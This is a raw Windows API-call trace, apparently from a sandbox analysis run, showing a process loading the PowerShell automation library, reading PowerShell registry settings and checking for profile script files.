	[0355.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.682] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.682] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.682] CoTaskMemFree (pv=0x436a00) 
	[0355.684] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.687] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.687] CoTaskMemFree (pv=0x436a00) 
	[0355.688] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.688] CoTaskMemFree (pv=0x436a00) 
	[0355.688] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.688] CoTaskMemFree (pv=0x436a00) 
	[0355.689] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.689] CoTaskMemFree (pv=0x436a00) 
	[0355.691] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.691] CoTaskMemFree (pv=0x436a00) 
	[0355.691] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.691] CoTaskMemFree (pv=0x436a00) 
	[0355.692] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.692] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.888] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.907] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.907] CoTaskMemFree (pv=0x436a00) 
	[0356.201] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x436e40
	[0356.202] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x436f50
	[0356.534] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.707] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.710] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.710] VirtualQuery (in: lpAddress=0x1ca680, lpBuffer=0x1cb540, dwLength=0x30 | out: lpBuffer=0x1cb540*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.735] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.736] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.736] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.737] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.738] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.738] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.739] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.740] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.740] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.741] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.741] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.741] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.741] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.741] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.741] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.741] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.741] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.741] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.741] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.742] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.742] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.742] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.742] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.742] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.742] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.742] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.742] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.742] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.742] VirtualQuery (in: lpAddress=0x1cbc30, lpBuffer=0x1ccaf0, dwLength=0x30 | out: lpBuffer=0x1ccaf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.743] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0356.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.743] CoTaskMemFree (pv=0x437060) 
	[0356.898] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0356.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.898] CoTaskMemFree (pv=0x437060) 
	[0356.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.912] VirtualQuery (in: lpAddress=0x1cbee0, lpBuffer=0x1ccda0, dwLength=0x30 | out: lpBuffer=0x1ccda0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.913] VirtualQuery (in: lpAddress=0x1cbee0, lpBuffer=0x1ccda0, dwLength=0x30 | out: lpBuffer=0x1ccda0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.913] VirtualQuery (in: lpAddress=0x1cb730, lpBuffer=0x1cc5f0, dwLength=0x30 | out: lpBuffer=0x1cc5f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.913] VirtualQuery (in: lpAddress=0x1cb730, lpBuffer=0x1cc5f0, dwLength=0x30 | out: lpBuffer=0x1cc5f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.913] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdd38 | out: phkResult=0x1cdd38*=0x328) returned 0x0
	[0356.914] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdcbc, lpData=0x0, lpcbData=0x1cdcb8*=0x0 | out: lpType=0x1cdcbc*=0x1, lpData=0x0, lpcbData=0x1cdcb8*=0x56) returned 0x0
	[0356.914] CoTaskMemAlloc (cb=0x5a) returned 0x1b754e70
	[0356.914] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdc8c, lpData=0x1b754e70, lpcbData=0x1cdc88*=0x56 | out: lpType=0x1cdc8c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdc88*=0x56) returned 0x0
	[0356.914] CoTaskMemFree (pv=0x1b754e70) 
	[0356.914] RegCloseKey (hKey=0x328) returned 0x0
	[0356.914] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdd38 | out: phkResult=0x1cdd38*=0x328) returned 0x0
	[0356.914] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdcbc, lpData=0x0, lpcbData=0x1cdcb8*=0x0 | out: lpType=0x1cdcbc*=0x1, lpData=0x0, lpcbData=0x1cdcb8*=0x56) returned 0x0
	[0356.914] CoTaskMemAlloc (cb=0x5a) returned 0x1b754e70
	[0356.914] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdc8c, lpData=0x1b754e70, lpcbData=0x1cdc88*=0x56 | out: lpType=0x1cdc8c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdc88*=0x56) returned 0x0
	[0356.914] CoTaskMemFree (pv=0x1b754e70) 
	[0356.914] RegCloseKey (hKey=0x328) returned 0x0
	[0356.914] CoTaskMemAlloc (cb=0x20c) returned 0x1b720970
	[0356.914] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b720970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0356.915] CoTaskMemFree (pv=0x1b720970) 
	[0356.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0356.915] CoTaskMemAlloc (cb=0x20c) returned 0x1b720970
	[0356.915] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b720970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0356.915] CoTaskMemFree (pv=0x1b720970) 
	[0356.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0356.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cda90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0356.916] SetErrorMode (uMode=0x1) returned 0x1
	[0356.916] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdca0 | out: lpFileInformation=0x1cdca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0356.916] SetErrorMode (uMode=0x1) returned 0x1
	[0356.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cda90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0356.916] SetErrorMode (uMode=0x1) returned 0x1
	[0356.916] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdca0 | out: lpFileInformation=0x1cdca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0356.916] SetErrorMode (uMode=0x1) returned 0x1
	[0356.916] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cda90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0356.916] SetErrorMode (uMode=0x1) returned 0x1
